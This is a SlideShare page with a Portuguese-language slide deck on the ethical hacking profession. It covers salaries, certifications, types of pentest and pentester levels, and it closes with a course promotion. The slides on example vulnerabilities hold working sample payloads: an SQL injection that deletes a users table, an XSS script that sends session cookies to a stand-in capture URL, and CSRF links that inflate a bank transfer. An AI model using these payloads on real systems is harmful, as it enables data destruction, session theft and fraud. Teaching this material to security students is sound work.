SlideShare uma empresa Scribd logo
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com
Marcos Flávio Araújo Assunção
Formação:
Mestre em Sistemas de Informação pela Universidade Fumec
Especialista em Redes de Computadores pela ESAB
Especialista em Docência para o ensino profissional pelo Senac Minas
Graduado em Engenharia de Software pelo Centro Universitário UMA
Atuação:
Professor universitário no Centro Universitário UNA
Orientador de curso no Senac Minas
Consultor e palestrante em segurança de redes e ensino profissionalizante
Marcos Flávio Araújo Assunção
Certificações
CEH
CCNA
Cisco ITQ
Publicações:
Guia do Hacker Brasileiro
Desafio Linux Hacker
Segredos do Hacker Ético
(5 edições)
Honeypots e Honeynets
Wireless Hacking
Projetos:
Valhala Honeypot
Por que a área de IT
Security cresce tanto?
Principais problemas (Fonte: govtech.com)
Como o mercado vê o
Hacker ético
profissional?
Forbes – Hacker Ético é uma das
principais carreiras do futuro
Governo americano recruta hackers
globodigital
Cresce a busca pelo Hacker Ético
jornal-o-globo
MCT convida movimento Hacker
brasilgov
Precisa-se de Hackers experientes
estadominas-online
Quanto é o salário de
um Pentester (Ethical
Hacker) ?
Fonte: indeed.com
Pagamento médio CEH (Fonte: softwareadvice.com)
Linkedin: a fonte de oportunidades em Ethical Hacking
Freelancing em Ethical Hacking
O que faz um
profissional Hacker
Ético / Pentester ?
Penetration Test (Teste de Invasão)
 Consiste em utilizar
técnicas de Hackers em
testes de stress da
segurança de redes e
sistemas
 É a principal ferramenta
de um Hacker Ético
 CEH, LPT, Ethical Hacking
Foundation, OCSP, GWAPT,
GPEN, etc.
Padrões e entidades que exigem Penetration Tests
Teste de “stress” – Uma necessidade real
Teste de “stress” - Pressão
capacete
Teste de “stress” - Temperatura
flame-test-helmet
Fases de um PenTest
Tipos de Penetration Test
Black Box
White Box
Gray Box
Black Box
Teste realizado em um sistema remoto, sem
nenhum conhecimento do alvo. O invasor deve
partir da estaca zero, sem informações sobre
endereços IPs públicos, sistemas operacionais
utilizados, tipos de roteadores e firewalls, etc.
Esse teste visa demonstrar a visão de um
atacante de fora da intranet da empresa.
Gray Box
Teste realizado entre departamentos ou sub-redes de uma
intranet, com conhecimento parcial da estrutura. O objetivo
desse teste é demonstrar até que ponto um funcionário
consegue chegar caso ele decida tentar acessar um sistema
de outro departamento ao qual ele não tem acesso legítimo.
Nesse tipo de PenTest, temos conhecimento parcial da rede,
como a faixa de endereços IPs utilizada na sub-rede de
origem, o endereço IP do gateway e do servidor DNS, etc.
White Box
Teste realizado em uma intranet local, com total
conhecimento do alvo. Nesse teste, temos o conhecimento
total de como a rede opera, sabemos todos os dispositivos,
endereços e sistemas operacionais utilizados. A visão de um
teste White Box é a de um administrador de rede. Essa
metodologia de testagem é utilizada quando desejamos
conhecer até onde um administrador poderá ir caso deseje
acessar dados ou obter informações, tais como conversar de
MSN, senhas de usuários, e-mails alheios, etc.
Níveis de um Pentester / Ethical Hacker
Nível 1 – Júnior – Tool based Penetration Tester:
Esse profissional é aquele que somente conhece as ferramentas básicas para
o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.
Muitas vezes aprenderam as técnicas em treinamentos específicos.
Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e
GWapt
Nível 2 – Pleno – Coding based Penetration Tester:
Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para
a realização dos penetration tests, mas ainda está limitado ao teste de
vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções
existentes, como criar novos módulos para o Metasploit. Necessita de
conhecimentos pelo menos em algoritmos e linguagens básicas de programação.
Temos nesse nível o OSCP.
Nível 3 – Sênior – Vulnerability Researcher:
Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento
mais avançado preferem debugar o funcionamento de softwares e protocolos
em busca de falhas do tipo 0-day, e muitos são contratados por empresas com
essa finalidade. Ainda não existe uma certificação de peso neste nível.
Certificações de
Ethical Hacking
EXIN Ethical Hacking Foundation
EC-COUNCIL Certified Ethical Hacker (CEH)
EC-COUNCIL ECSA Pentest
ECCOUNCIL Licensed Penetration Tester
GIAC - GPEN
GIAC GWAPT
Offensive Security Certified Professional
Exemplos de
vulnerabilidades
testadas
Falhas de softwares
 Buffer Overflows
(Stack e Heap)
 Strings de format
vulneráveis
 Memory corruption
 Injection (SQL,
XPATH, CMD, XSS,
CSRF)
 Permissões incorretas
SQL Injection
GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users
WHERE 1=‘1 HTTP/1.1
SELECT *
FROM users
WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
Cross Site Scripting <XSS>
 <script> alert(‘Oi’!) </script>
 <script>
location.href=“http://www.site.com/captura.cfm?c=“
+ document.cookie</script>
 <a href=“javas&#99;ript&#35;[código]>
 <div style=“behaviour: url([código]);”>
 <body onload=“[código]”>
 <img src=“javascript:[código]”>
Cross Site Request Forgery (CSRF)
 Exemplo: Maria está logada no site do banco e a URL da transação é:
http://banco.com/transf?conta=MARIA&quantia=100
Um ataque pode criar um link que altera o valor da transação:
<a href=http://banco.com/transf?conta=MARIA$quantia=100000>
Ou uma imagem “falsa”:
<img src=http://banco.com/transf?conta=MARIA$quantia=100000>
Quero atuar na área.
Como começar?
Treinamento em Fundamentos de Ethical Hacking
• 21 horas de vídeos
• 175 aulas
• Acesso ilimitado e eterno
• Certificado internacional
• Conteúdo aborda a maioria
das certificações de PenTest
• 50% de desconto: pague apenas 100
reais pelo curso.
Acesse para aproveitar a promoção:
www.marcosflavio.com.br
Dúvidas?
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com

Mais conteúdo relacionado

Importância do profissional Hacker ético no mercado de trabalho

  • 1. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com
  • 2. Marcos Flávio Araújo Assunção Formação: Mestre em Sistemas de Informação pela Universidade Fumec Especialista em Redes de Computadores pela ESAB Especialista em Docência para o ensino profissional pelo Senac Minas Graduado em Engenharia de Software pelo Centro Universitário UMA Atuação: Professor universitário no Centro Universitário UNA Orientador de curso no Senac Minas Consultor e palestrante em segurança de redes e ensino profissionalizante
  • 3. Marcos Flávio Araújo Assunção Certificações CEH CCNA Cisco ITQ Publicações: Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético (5 edições) Honeypots e Honeynets Wireless Hacking Projetos: Valhala Honeypot
  • 4. Por que a área de IT Security cresce tanto?
  • 6. Como o mercado vê o Hacker ético profissional?
  • 7. Forbes – Hacker Ético é uma das principais carreiras do futuro
  • 8. Governo americano recruta hackers globodigital
  • 9. Cresce a busca pelo Hacker Ético jornal-o-globo
  • 10. MCT convida movimento Hacker brasilgov
  • 11. Precisa-se de Hackers experientes estadominas-online
  • 12. Quanto é o salário de um Pentester (Ethical Hacker) ?
  • 14. Pagamento médio CEH (Fonte: softwareadvice.com)
  • 15. Linkedin: a fonte de oportunidades em Ethical Hacking
  • 17. O que faz um profissional Hacker Ético / Pentester ?
  • 18. Penetration Test (Teste de Invasão)  Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas  É a principal ferramenta de um Hacker Ético  CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.
  • 19. Padrões e entidades que exigem Penetration Tests
  • 20. Teste de “stress” – Uma necessidade real
  • 21. Teste de “stress” - Pressão capacete
  • 22. Teste de “stress” - Temperatura flame-test-helmet
  • 23. Fases de um PenTest
  • 24. Tipos de Penetration Test Black Box White Box Gray Box
  • 25. Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
  • 26. Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
  • 27. White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
  • 28. Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.
  • 30. EXIN Ethical Hacking Foundation
  • 38. Falhas de softwares  Buffer Overflows (Stack e Heap)  Strings de format vulneráveis  Memory corruption  Injection (SQL, XPATH, CMD, XSS, CSRF)  Permissões incorretas
  • 39. SQL Injection GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
  • 40. Cross Site Scripting <XSS>  <script> alert(‘Oi’!) </script>  <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>  <a href=“javas&#99;ript&#35;[código]>  <div style=“behaviour: url([código]);”>  <body onload=“[código]”>  <img src=“javascript:[código]”>
  • 41. Cross Site Request Forgery (CSRF)  Exemplo: Maria está logada no site do banco e a URL da transação é: http://banco.com/transf?conta=MARIA&quantia=100 Um ataque pode criar um link que altera o valor da transação: <a href=http://banco.com/transf?conta=MARIA$quantia=100000> Ou uma imagem “falsa”: <img src=http://banco.com/transf?conta=MARIA$quantia=100000>
  • 42. Quero atuar na área. Como começar?
  • 43. Treinamento em Fundamentos de Ethical Hacking • 21 horas de vídeos • 175 aulas • Acesso ilimitado e eterno • Certificado internacional • Conteúdo aborda a maioria das certificações de PenTest • 50% de desconto: pague apenas 100 reais pelo curso. Acesse para aproveitar a promoção: www.marcosflavio.com.br
  • 45. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com